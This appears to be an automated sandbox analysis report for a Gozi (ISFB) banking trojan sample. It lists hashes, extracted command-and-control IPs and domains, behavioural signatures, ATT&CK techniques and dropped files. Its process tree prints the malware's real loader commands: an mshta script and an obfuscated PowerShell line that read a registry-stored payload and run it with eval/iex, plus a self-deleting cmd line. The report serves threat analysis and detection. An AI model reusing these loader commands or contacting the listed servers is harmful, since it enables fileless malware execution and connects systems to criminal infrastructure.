gozi | 729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab

Analysis

max time kernel
151s
max time network
123s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
03-10-2023 15:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client.exe
Size

295KB
MD5

de21fe50192a021dd37b67881fd332ba
SHA1

44c9c72bf5cd81a82ce7870dc765095f303c7fdf
SHA256

729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab
SHA512

6650fe6e0f2866e442a9f753f90fc8aaf594d1d976207a94724f506d840ad6514b4c18392cbc3d51304dd2afb7fadce72f71b385899136b2e593c9fc1eda934a
SSDEEP

3072:F62X2mvtkAa8QoRzUA/nAUZSuJC/w3mA8FfbJ1fzodp/jhNGY:s2XXviAa8QontJF3b8NHfzodpv

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

948 cmd.exe

pid	process
948	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2084 set thread context of 1236	2084	powershell.exe	Explorer.EXE
PID 1236 set thread context of 948	1236	Explorer.EXE	cmd.exe
PID 948 set thread context of 1304	948	cmd.exe	PING.EXE
PID 1236 set thread context of 2156	1236	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1304 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1304 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1304	PING.EXE

pid	process
1304	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
2732	client.exe
2084	powershell.exe
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE
1236	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1236 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2084 powershell.exe
1236 Explorer.EXE
948 cmd.exe
1236 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2084 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1236 Explorer.EXE

pid	process
1236	Explorer.EXE

pid	process
2084	powershell.exe
1236	Explorer.EXE
948	cmd.exe
1236	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	2084	powershell.exe

pid	process
1236	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1100 wrote to memory of 2084	1100	mshta.exe	powershell.exe
PID 1100 wrote to memory of 2084	1100	mshta.exe	powershell.exe
PID 1100 wrote to memory of 2084	1100	mshta.exe	powershell.exe
PID 2084 wrote to memory of 2404	2084	powershell.exe	csc.exe
PID 2084 wrote to memory of 2404	2084	powershell.exe	csc.exe
PID 2084 wrote to memory of 2404	2084	powershell.exe	csc.exe
PID 2404 wrote to memory of 2760	2404	csc.exe	cvtres.exe
PID 2404 wrote to memory of 2760	2404	csc.exe	cvtres.exe
PID 2404 wrote to memory of 2760	2404	csc.exe	cvtres.exe
PID 2084 wrote to memory of 1984	2084	powershell.exe	csc.exe
PID 2084 wrote to memory of 1984	2084	powershell.exe	csc.exe
PID 2084 wrote to memory of 1984	2084	powershell.exe	csc.exe
PID 1984 wrote to memory of 1956	1984	csc.exe	cvtres.exe
PID 1984 wrote to memory of 1956	1984	csc.exe	cvtres.exe
PID 1984 wrote to memory of 1956	1984	csc.exe	cvtres.exe
PID 2084 wrote to memory of 1236	2084	powershell.exe	Explorer.EXE
PID 2084 wrote to memory of 1236	2084	powershell.exe	Explorer.EXE
PID 2084 wrote to memory of 1236	2084	powershell.exe	Explorer.EXE
PID 1236 wrote to memory of 948	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 948	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 948	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 948	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 948	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 948	1236	Explorer.EXE	cmd.exe
PID 948 wrote to memory of 1304	948	cmd.exe	PING.EXE
PID 948 wrote to memory of 1304	948	cmd.exe	PING.EXE
PID 948 wrote to memory of 1304	948	cmd.exe	PING.EXE
PID 948 wrote to memory of 1304	948	cmd.exe	PING.EXE
PID 948 wrote to memory of 1304	948	cmd.exe	PING.EXE
PID 948 wrote to memory of 1304	948	cmd.exe	PING.EXE
PID 1236 wrote to memory of 2156	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 2156	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 2156	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 2156	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 2156	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 2156	1236	Explorer.EXE	cmd.exe
PID 1236 wrote to memory of 2156	1236	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1236

C:\Users\Admin\AppData\Local\Temp\client.exe
"C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2732

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bsvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bsvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\14432B37-6353-66A1-8D88-47FA113C6BCE\\\ClassLocal'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rijwvehl -value gp; new-alias -name ckgfuify -value iex; ckgfuify ([System.Text.Encoding]::ASCII.GetString((rijwvehl "HKCU:Software\AppDataLow\Software\Microsoft\14432B37-6353-66A1-8D88-47FA113C6BCE").OperatorTime))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2084

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7b63x7q1.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7CA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7C9.tmp"
5⤵
PID:2760

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rms4nfmh.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD866.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD865.tmp"
5⤵
PID:1956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1304

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2156

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7b63x7q1.dll
Filesize
3KB

MD5
b42b712925b2d4b85a3905725d8e9be3

SHA1
b3549edf72c9b742d723df500e9b8b6245543223

SHA256
8c8226b13b9744387832b197555c9eaa9e8a08ed879288d32e04828e67155fd1

SHA512
8a5a23bf67c25c20d9be32fe680eaf9ef48ee097d3e77cf8dd0cd772276a9986aa86c2984f7e12ff682a92a84d4d98658ce0ef67d3651cf65b37bbb4654a79e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7b63x7q1.pdb
Filesize
7KB

MD5
3833d9c85733f7902e539462dcc2cd23

SHA1
7f0f1424a523ee58478cf064bdc2b325b88e6691

SHA256
1b02ab3a9a82cc30f895d18b2cd619d9fc3134674f601c5674d447b26f0e1313

SHA512
70e0f0791450fa55b0106b44731503d21e180694b8f17e4a122ba435e56e09fd6e36ba65e8069eb8013ccdf880785e3b0ac1c8c2dd891f3915255946ba9560f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD7CA.tmp
Filesize
1KB

MD5
eaf551847e8570b7e3ec9c10475c63dd

SHA1
23599150791ffcffbddb30962b2b01b091cb9bb0

SHA256
b2f4f89ae5496b832b13e35cf7fcc5e8ec3c3938527772c82ab61005c32accec

SHA512
4f9aebb4b3d30c955fc8aa68640280640da57b03e051bbf6145b2465a68bebdfcbd92800f94298bd01c8c9cf4f4b15fecbfabdc4e0904ebc2c68eb16c884513f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD866.tmp
Filesize
1KB

MD5
a5f1611b527ded4b9dd6d1f24d7e20ae

SHA1
4a060d580143522241b96dc89bc13f5c9d31e5b6

SHA256
91ff3f22a41522bfa8804f3bdec2100ce10862d568f4d518ed74ab5faf52cf40

SHA512
89cce3c3c08e6e4dc688439d4388f78df7958c74d6d869f88a997eb294c2f9f2cf802937bb401c7682eeff7b9992ab1f34cf7cfdcffb8f9893ff7e15e6310a6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\rms4nfmh.dll
Filesize
3KB

MD5
51aab1041ac71773bca7d10273e83d72

SHA1
acaa297a32d95f871cf74f102e30821e368c5fe8

SHA256
3395b6a4cbd507fe439742a634281e7e6ccba3bcb105b8e6c987af27c9aea7ca

SHA512
685eb1f1fc03a1907b75ade2a42bc5f38a792d9bbc86532e28cdfcd80b56cc4aafec31a8cc7d440d3734ff7ff0585c5d9211414f5799eef9fe403866ca15d1b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\rms4nfmh.pdb
Filesize
7KB

MD5
a3ed9e7797c811051931d98f752b078b

SHA1
ae69c328c789ad4e6d4aba5e772795b5b20b6ebb

SHA256
81ad18fb2bb36afc9a2703e13415686c7b79e92c96a65f56907903699451a739

SHA512
46cfcfa53fd96d9089ae32cf6f4b2a02a8eccea84d54a79224f6c8c9d2e3811f02fde00f7d4f37515cb22ce860f9763cfad502893ae3197f14798c3e7f8074bc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7b63x7q1.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7b63x7q1.cmdline
Filesize
309B

MD5
b4691987ad476648f0e5a5e02b81a64a

SHA1
e490b4ecca5c68a127bf9fb4479fca75f0464b04

SHA256
998435161881fe91062b092cdfae5f82ea681c7854b349af422d439e3342e518

SHA512
14d456acc39bd97d61e1451da6b59cbc9e1dd468c8d07d339bddccdb6365b046eb41210c43b431d19952e5efade2e1ecbefa0b5c1a2148563b57a476885721cf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD7C9.tmp
Filesize
652B

MD5
644abaf608841ec199a6d136d1c10bc6

SHA1
695d3a89c6d220843c27bdd2cd3ec3004d6f0ff8

SHA256
a1ddfd6629e5faaa3d1f872608e5448823402097f994d622a2ff6f792226df97

SHA512
b98c6167a301aefc239f6cf2754764930d690b10ab052582928d19b42c053bf171df1edb9ba3e085deae81bff6d3be954628f9a74a08f71f8026b91713a1e21d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD865.tmp
Filesize
652B

MD5
9443496a5a74f1b4014f8e0c3d769d74

SHA1
4211ba6a0e1084f80378258f215853c4816ed813

SHA256
06d35f6ba93b3f6000383272705fc1d68099f665566877791c2c5d3806479038

SHA512
4919d45c291e897abfde179a774518e0600ffd8a745a4a118c66b996879c6691f58a56d6d3db8de3baa31a8d5f1b618331ef4b6cba2c1bd47c2d305200a84f74

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rms4nfmh.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rms4nfmh.cmdline
Filesize
309B

MD5
295252181a4a8013d96d29903a8320f4

SHA1
19512ddd2d902f8a56c314bbf36607f33da90704

SHA256
10156dc14100d530e3001f0ac87cf53187c24add82cecca68bc8ca57f6ac3cf0

SHA512
e8f0190a2d4444938e9691eb993fbc5513e21876566c1b7f83ab5a4b3e5c758b5a7814808949f12e2ee88606758cf05723c672629d007eca4ad51ba1863bfa0c

Download Submit
memory/948-77-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/948-79-0x0000000000410000-0x0000000000411000-memory.dmp

Filesize
4KB

Download
memory/948-78-0x0000000001B50000-0x0000000001BF4000-memory.dmp

Filesize
656KB

Download
memory/948-98-0x0000000001B50000-0x0000000001BF4000-memory.dmp

Filesize
656KB

Download
memory/1236-96-0x0000000004B40000-0x0000000004BE4000-memory.dmp

Filesize
656KB

Download
memory/1236-66-0x0000000004B40000-0x0000000004BE4000-memory.dmp

Filesize
656KB

Download
memory/1236-67-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/1304-84-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1304-85-0x0000000001B20000-0x0000000001BC4000-memory.dmp

Filesize
656KB

Download
memory/1304-97-0x0000000001B20000-0x0000000001BC4000-memory.dmp

Filesize
656KB

Download
memory/1304-86-0x0000000000090000-0x0000000000091000-memory.dmp

Filesize
4KB

Download
memory/1984-56-0x00000000004D0000-0x0000000000550000-memory.dmp

Filesize
512KB

Download
memory/2084-27-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2084-24-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2084-45-0x00000000027F0000-0x00000000027F8000-memory.dmp

Filesize
32KB

Download
memory/2084-30-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2084-29-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp

Filesize
9.6MB

Download
memory/2084-28-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2084-62-0x0000000002800000-0x0000000002808000-memory.dmp

Filesize
32KB

Download
memory/2084-23-0x000000001B170000-0x000000001B452000-memory.dmp

Filesize
2.9MB

Download
memory/2084-65-0x000000001B630000-0x000000001B66D000-memory.dmp

Filesize
244KB

Download
memory/2084-26-0x0000000002810000-0x0000000002890000-memory.dmp

Filesize
512KB

Download
memory/2084-25-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp

Filesize
9.6MB

Download
memory/2084-70-0x000007FEF48A0000-0x000007FEF523D000-memory.dmp

Filesize
9.6MB

Download
memory/2084-72-0x000000001B630000-0x000000001B66D000-memory.dmp

Filesize
244KB

Download
memory/2156-94-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2156-91-0x00000000003A0000-0x0000000000438000-memory.dmp

Filesize
608KB

Download
memory/2156-95-0x00000000003A0000-0x0000000000438000-memory.dmp

Filesize
608KB

Download
memory/2404-36-0x0000000002330000-0x00000000023B0000-memory.dmp

Filesize
512KB

Download
memory/2732-1-0x0000000000290000-0x0000000000390000-memory.dmp

Filesize
1024KB

Download
memory/2732-18-0x0000000003B50000-0x0000000003B52000-memory.dmp

Filesize
8KB

Download
memory/2732-9-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/2732-8-0x00000000001B0000-0x00000000001BB000-memory.dmp

Filesize
44KB

Download
memory/2732-7-0x0000000000290000-0x0000000000390000-memory.dmp

Filesize
1024KB

Download
memory/2732-4-0x00000000001D0000-0x00000000001DD000-memory.dmp

Filesize
52KB

Download
memory/2732-3-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/2732-2-0x00000000001B0000-0x00000000001BB000-memory.dmp

Filesize
44KB

Download